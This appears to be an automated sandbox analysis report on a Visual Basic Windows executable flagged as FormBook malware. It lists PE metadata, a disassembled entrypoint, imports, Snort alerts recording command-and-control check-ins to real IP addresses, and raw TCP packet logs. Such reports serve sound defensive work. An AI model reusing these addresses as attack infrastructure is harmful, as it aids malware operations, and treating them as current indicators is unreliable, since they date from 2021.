                                                                                                                                                    TLS Callbacks:
                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                    OS Version Major:4
                                                                                                                                                    OS Version Minor:0
                                                                                                                                                    File Version Major:4
                                                                                                                                                    File Version Minor:0
                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                    Import Hash:9b824bd6da8a9367fa6d96e7ab5dc79d

                                                                                                                                                    Entrypoint Preview

                                                                                                                                                    Instruction
                                                                                                                                                    push 0040248Ch
                                                                                                                                                    call 00007F2F94657165h
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    xor byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    cmp byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    retn 7DB9h
                                                                                                                                                    rol dword ptr [edx-4FB66314h], cl
                                                                                                                                                    lahf
                                                                                                                                                    adc al, 30h
                                                                                                                                                    xor dl, byte ptr [ecx+7Ah]
                                                                                                                                                    wait
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add dword ptr [eax], eax
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    dec eax
                                                                                                                                                    bound esi, dword ptr fs:[di]
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add bh, bh
                                                                                                                                                    int3
                                                                                                                                                    xor dword ptr [eax], eax
                                                                                                                                                    sub eax, EEFC9A4Dh
                                                                                                                                                    mov esp, 8C4190F1h
                                                                                                                                                    cmc
                                                                                                                                                    int C3h

                                                                                                                                                    Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x1ff54          0x28          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x23000          0xf3e         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x238            0x20
IMAGE_DIRECTORY_ENTRY_IAT             0x1000           0x21c         .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                                                                                                                    Sections

Name   Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
.text  0x1000           0x1f5fc       0x20000   False     0.545219421387   data       6.27115768408  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data  0x21000          0x19ec        0x1000    False     0.00634765625    data       0.0            IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc  0x23000          0xf3e         0x1000    False     0.274658203125   data       3.57168530772  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                    Resources

Name           RVA      Size   Type                                                    Language  Country
CUSTOM         0x239c0  0x57e  MS Windows icon resource - 1 icon, 16x16, 8 bits/pixel  English   United States
RT_ICON        0x23458  0x568  GLS_BINARY_LSB_FIRST
RT_GROUP_ICON  0x23444  0x14   data
RT_VERSION     0x23140  0x304  data                                                    English   United States

                                                                                                                                                    Imports

DLL           Import
MSVBVM60.DLL  __vbaVarTstGt, _CIcos, _adj_fptan, __vbaHresultCheck, __vbaAryMove, __vbaFreeVar, __vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, _adj_fdiv_m64, _adj_fprem1, __vbaStrCat, __vbaHresultCheckObj, __vbaLenBstrB, _adj_fdiv_m32, __vbaAryVar, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, __vbaVarTstLt, _CIsin, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaGet3, __vbaVarTstEq, __vbaAryConstruct2, __vbaObjVar, _adj_fpatan, __vbaStrR8, EVENT_SINK_Release, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, __vbaVarCat, _CIlog, __vbaErrorOverflow, __vbaFileOpen, __vbaVar2Vec, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaI4Var, __vbaVarDup, __vbaFpI4, _CIatan, __vbaStrMove, __vbaAryCopy, __vbaR8IntI4, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

                                                                                                                                                    Version Infos

Description       Data
Translation       0x0409 0x04b0
LegalCopyright    BiSide Frak
InternalName      gadehan
FileVersion       1.00
CompanyName       BiSide Frak
LegalTrademarks   BiSide Frak
Comments          BiSide Frak
ProductName       BiSide Frak
ProductVersion    1.00
FileDescription   BiSide Frak
OriginalFilename  gadehan.exe

                                                                                                                                                    Possible Origin

Language of compilation system  Country where language is spoken  Map
English                         United States

                                                                                                                                                    Network Behavior

                                                                                                                                                    Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
11/29/21-14:07:16.667835 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49815 | 80 | 192.168.11.20 | 164.155.212.139
11/29/21-14:07:16.667835 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49815 | 80 | 192.168.11.20 | 164.155.212.139
11/29/21-14:07:16.667835 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49815 | 80 | 192.168.11.20 | 164.155.212.139
11/29/21-14:07:22.543446 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49816 | 80 | 192.168.11.20 | 35.244.144.199
11/29/21-14:07:22.543446 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49816 | 80 | 192.168.11.20 | 35.244.144.199
11/29/21-14:07:22.543446 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49816 | 80 | 192.168.11.20 | 35.244.144.199
11/29/21-14:07:39.005893 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49817 | 80 | 192.168.11.20 | 216.172.172.87
11/29/21-14:07:39.005893 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49817 | 80 | 192.168.11.20 | 216.172.172.87
11/29/21-14:07:39.005893 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49817 | 80 | 192.168.11.20 | 216.172.172.87
11/29/21-14:07:49.612411 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49819 | 80 | 192.168.11.20 | 172.120.157.187
11/29/21-14:07:49.612411 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49819 | 80 | 192.168.11.20 | 172.120.157.187
11/29/21-14:07:49.612411 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49819 | 80 | 192.168.11.20 | 172.120.157.187
11/29/21-14:08:05.340313 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49820 | 34.102.136.180 | 192.168.11.20
11/29/21-14:08:30.765151 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49821 | 80 | 192.168.11.20 | 34.237.47.210
11/29/21-14:08:30.765151 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49821 | 80 | 192.168.11.20 | 34.237.47.210
11/29/21-14:08:30.765151 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49821 | 80 | 192.168.11.20 | 34.237.47.210
11/29/21-14:09:02.814063 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49826 | 34.102.136.180 | 192.168.11.20
11/29/21-14:09:18.060453 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49827 | 80 | 192.168.11.20 | 216.172.172.87
11/29/21-14:09:18.060453 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49827 | 80 | 192.168.11.20 | 216.172.172.87
11/29/21-14:09:18.060453 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49827 | 80 | 192.168.11.20 | 216.172.172.87
11/29/21-14:09:28.412970 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49829 | 80 | 192.168.11.20 | 172.120.157.187
11/29/21-14:09:28.412970 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49829 | 80 | 192.168.11.20 | 172.120.157.187
11/29/21-14:09:28.412970 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49829 | 80 | 192.168.11.20 | 172.120.157.187
11/29/21-14:09:58.937306 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49832 | 34.102.136.180 | 192.168.11.20
11/29/21-14:10:39.935796 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49837 | 80 | 192.168.11.20 | 34.102.136.180
11/29/21-14:10:39.935796 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49837 | 80 | 192.168.11.20 | 34.102.136.180
11/29/21-14:10:39.935796 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49837 | 80 | 192.168.11.20 | 34.102.136.180
11/29/21-14:10:40.043905 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49837 | 34.102.136.180 | 192.168.11.20
11/29/21-14:10:51.376867 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49838 | 81.2.194.128 | 192.168.11.20
11/29/21-14:11:00.935765 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49841 | 80 | 192.168.11.20 | 172.67.201.232
11/29/21-14:11:00.935765 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49841 | 80 | 192.168.11.20 | 172.67.201.232
11/29/21-14:11:00.935765 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49841 | 80 | 192.168.11.20 | 172.67.201.232
11/29/21-14:11:17.042098 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49847 | 80 | 192.168.11.20 | 216.172.172.87
11/29/21-14:11:17.042098 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49847 | 80 | 192.168.11.20 | 216.172.172.87
11/29/21-14:11:17.042098 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49847 | 80 | 192.168.11.20 | 216.172.172.87
11/29/21-14:11:27.640578 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49851 | 80 | 192.168.11.20 | 172.120.157.187
11/29/21-14:11:27.640578 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49851 | 80 | 192.168.11.20 | 172.120.157.187
11/29/21-14:11:27.640578 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49851 | 80 | 192.168.11.20 | 172.120.157.187
11/29/21-14:11:47.354580 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49855 | 34.102.136.180 | 192.168.11.20
11/29/21-14:11:56.764424 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable |  |  | 192.168.11.20 | 9.9.9.9
11/29/21-14:12:35.517215 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49860 | 80 | 192.168.11.20 | 172.67.201.232
11/29/21-14:12:35.517215 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49860 | 80 | 192.168.11.20 | 172.67.201.232
11/29/21-14:12:35.517215 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49860 | 80 | 192.168.11.20 | 172.67.201.232

                                                                                                                                                    TCP Packets

                                                                                                                                                    Nov 29, 2021 14:07:16.496157885 CET4981580192.168.11.20164.155.212.139
                                                                                                                                                    Nov 29, 2021 14:07:16.667465925 CET8049815164.155.212.139192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:16.667727947 CET4981580192.168.11.20164.155.212.139
                                                                                                                                                    Nov 29, 2021 14:07:16.667834997 CET4981580192.168.11.20164.155.212.139
                                                                                                                                                    Nov 29, 2021 14:07:16.839644909 CET8049815164.155.212.139192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:17.170830011 CET4981580192.168.11.20164.155.212.139
                                                                                                                                                    Nov 29, 2021 14:07:17.304024935 CET8049815164.155.212.139192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:17.304079056 CET8049815164.155.212.139192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:17.304218054 CET4981580192.168.11.20164.155.212.139
                                                                                                                                                    Nov 29, 2021 14:07:17.304270983 CET4981580192.168.11.20164.155.212.139
                                                                                                                                                    Nov 29, 2021 14:07:17.313054085 CET8049815164.155.212.139192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:17.313241005 CET4981580192.168.11.20164.155.212.139
                                                                                                                                                    Nov 29, 2021 14:07:17.342535019 CET8049815164.155.212.139192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:17.342780113 CET4981580192.168.11.20164.155.212.139
                                                                                                                                                    Nov 29, 2021 14:07:22.532157898 CET4981680192.168.11.2035.244.144.199
                                                                                                                                                    Nov 29, 2021 14:07:22.543171883 CET804981635.244.144.199192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:22.543386936 CET4981680192.168.11.2035.244.144.199
                                                                                                                                                    Nov 29, 2021 14:07:22.543446064 CET4981680192.168.11.2035.244.144.199
                                                                                                                                                    Nov 29, 2021 14:07:22.554408073 CET804981635.244.144.199192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:22.843972921 CET804981635.244.144.199192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:22.844050884 CET804981635.244.144.199192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:22.844106913 CET804981635.244.144.199192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:22.844146967 CET804981635.244.144.199192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:22.844369888 CET4981680192.168.11.2035.244.144.199
                                                                                                                                                    Nov 29, 2021 14:07:22.844484091 CET4981680192.168.11.2035.244.144.199
                                                                                                                                                    Nov 29, 2021 14:07:22.857911110 CET804981635.244.144.199192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:22.857976913 CET804981635.244.144.199192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:22.858022928 CET804981635.244.144.199192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:22.858273983 CET4981680192.168.11.2035.244.144.199
                                                                                                                                                    Nov 29, 2021 14:07:22.858334064 CET4981680192.168.11.2035.244.144.199
                                                                                                                                                    Nov 29, 2021 14:07:22.858346939 CET4981680192.168.11.2035.244.144.199
                                                                                                                                                    Nov 29, 2021 14:07:38.861797094 CET4981780192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:07:39.005481005 CET8049817216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:39.005810022 CET4981780192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:07:39.005892992 CET4981780192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:07:39.161848068 CET8049817216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:39.161941051 CET8049817216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:39.162003994 CET8049817216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:39.162050962 CET8049817216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:39.162307978 CET4981780192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:07:39.162379980 CET4981780192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:07:39.306080103 CET8049817216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:44.190640926 CET4981880192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:07:44.205166101 CET804981888.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:44.205355883 CET4981880192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:07:44.205419064 CET4981880192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:07:44.219970942 CET804981888.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:44.220025063 CET804981888.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:44.220061064 CET804981888.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:44.220303059 CET4981880192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:07:44.220355034 CET4981880192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:07:44.234875917 CET804981888.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:49.453260899 CET4981980192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:07:49.612102985 CET8049819172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:49.612317085 CET4981980192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:07:49.612411022 CET4981980192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:07:49.774852991 CET8049819172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:49.774925947 CET8049819172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:49.775254965 CET4981980192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:07:49.775356054 CET4981980192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:07:49.933950901 CET8049819172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:05.157622099 CET4982080192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:08:05.169008017 CET804982034.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:05.169368982 CET4982080192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:08:05.169428110 CET4982080192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:08:05.180783987 CET804982034.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:05.340312958 CET804982034.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:05.340364933 CET804982034.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:05.340609074 CET4982080192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:08:05.340650082 CET4982080192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:08:05.351778984 CET804982034.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:30.633732080 CET4982180192.168.11.2034.237.47.210
                                                                                                                                                    Nov 29, 2021 14:08:30.764815092 CET804982134.237.47.210192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:30.765036106 CET4982180192.168.11.2034.237.47.210
                                                                                                                                                    Nov 29, 2021 14:08:30.765151024 CET4982180192.168.11.2034.237.47.210
                                                                                                                                                    Nov 29, 2021 14:08:30.895849943 CET804982134.237.47.210192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:30.895956993 CET804982134.237.47.210192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:30.896008015 CET804982134.237.47.210192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:30.896305084 CET4982180192.168.11.2034.237.47.210
                                                                                                                                                    Nov 29, 2021 14:08:30.896374941 CET4982180192.168.11.2034.237.47.210
                                                                                                                                                    Nov 29, 2021 14:08:31.027067900 CET804982134.237.47.210192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:40.952833891 CET4982380192.168.11.20192.0.78.24
                                                                                                                                                    Nov 29, 2021 14:08:40.961817026 CET8049823192.0.78.24192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:40.962059975 CET4982380192.168.11.20192.0.78.24
                                                                                                                                                    Nov 29, 2021 14:08:40.962162971 CET4982380192.168.11.20192.0.78.24
                                                                                                                                                    Nov 29, 2021 14:08:40.971064091 CET8049823192.0.78.24192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:40.971302986 CET8049823192.0.78.24192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:40.971347094 CET8049823192.0.78.24192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:40.971628904 CET4982380192.168.11.20192.0.78.24
                                                                                                                                                    Nov 29, 2021 14:08:40.971666098 CET4982380192.168.11.20192.0.78.24
                                                                                                                                                    Nov 29, 2021 14:08:40.980632067 CET8049823192.0.78.24192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:46.174348116 CET4982480192.168.11.20203.170.80.250
                                                                                                                                                    Nov 29, 2021 14:08:46.448534966 CET8049824203.170.80.250192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:46.448755026 CET4982480192.168.11.20203.170.80.250
                                                                                                                                                    Nov 29, 2021 14:08:46.448832035 CET4982480192.168.11.20203.170.80.250
                                                                                                                                                    Nov 29, 2021 14:08:46.724001884 CET8049824203.170.80.250192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:46.724055052 CET8049824203.170.80.250192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:46.724332094 CET4982480192.168.11.20203.170.80.250
                                                                                                                                                    Nov 29, 2021 14:08:46.724368095 CET4982480192.168.11.20203.170.80.250
                                                                                                                                                    Nov 29, 2021 14:08:47.000067949 CET8049824203.170.80.250192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:52.099611998 CET4982580192.168.11.20136.143.191.204
                                                                                                                                                    Nov 29, 2021 14:08:52.261625051 CET8049825136.143.191.204192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:52.261850119 CET4982580192.168.11.20136.143.191.204
                                                                                                                                                    Nov 29, 2021 14:08:52.261940002 CET4982580192.168.11.20136.143.191.204
                                                                                                                                                    Nov 29, 2021 14:08:52.430764914 CET8049825136.143.191.204192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:52.430877924 CET8049825136.143.191.204192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:52.430958986 CET8049825136.143.191.204192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:52.431011915 CET8049825136.143.191.204192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:52.431021929 CET4982580192.168.11.20136.143.191.204
                                                                                                                                                    Nov 29, 2021 14:08:52.431061983 CET8049825136.143.191.204192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:52.431329966 CET4982580192.168.11.20136.143.191.204
                                                                                                                                                    Nov 29, 2021 14:08:52.431376934 CET4982580192.168.11.20136.143.191.204
                                                                                                                                                    Nov 29, 2021 14:08:52.431396008 CET4982580192.168.11.20136.143.191.204
                                                                                                                                                    Nov 29, 2021 14:08:52.593358994 CET8049825136.143.191.204192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:02.695481062 CET4982680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:02.706500053 CET804982634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:02.706729889 CET4982680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:02.706785917 CET4982680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:02.717880964 CET804982634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:02.814063072 CET804982634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:02.814126968 CET804982634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:02.814455986 CET4982680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:02.814560890 CET4982680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:03.116195917 CET4982680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:03.127361059 CET804982634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:17.925971031 CET4982780192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:09:18.060137987 CET8049827216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:18.060365915 CET4982780192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:09:58.877505064 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.877547026 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.877602100 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.877635002 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.877873898 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.878237009 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.878284931 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.878408909 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.878684044 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.878748894 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.878889084 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.879487038 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.879537106 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.879594088 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.879626036 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.879745007 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.879981995 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.884542942 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.937305927 CET804983234.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.937355995 CET804983234.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.937612057 CET4983280192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.937671900 CET4983280192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.948868990 CET804983234.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.995028973 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.995207071 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.995254993 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.995280027 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.995341063 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:34.395545006 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.553196907 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.553535938 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.554991961 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.555094004 CET4983580192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.712912083 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.713017941 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.713076115 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.713120937 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.713126898 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.713185072 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.713232040 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.713268995 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.713325977 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.713365078 CET8049834192.64.119.254192.168.11.20
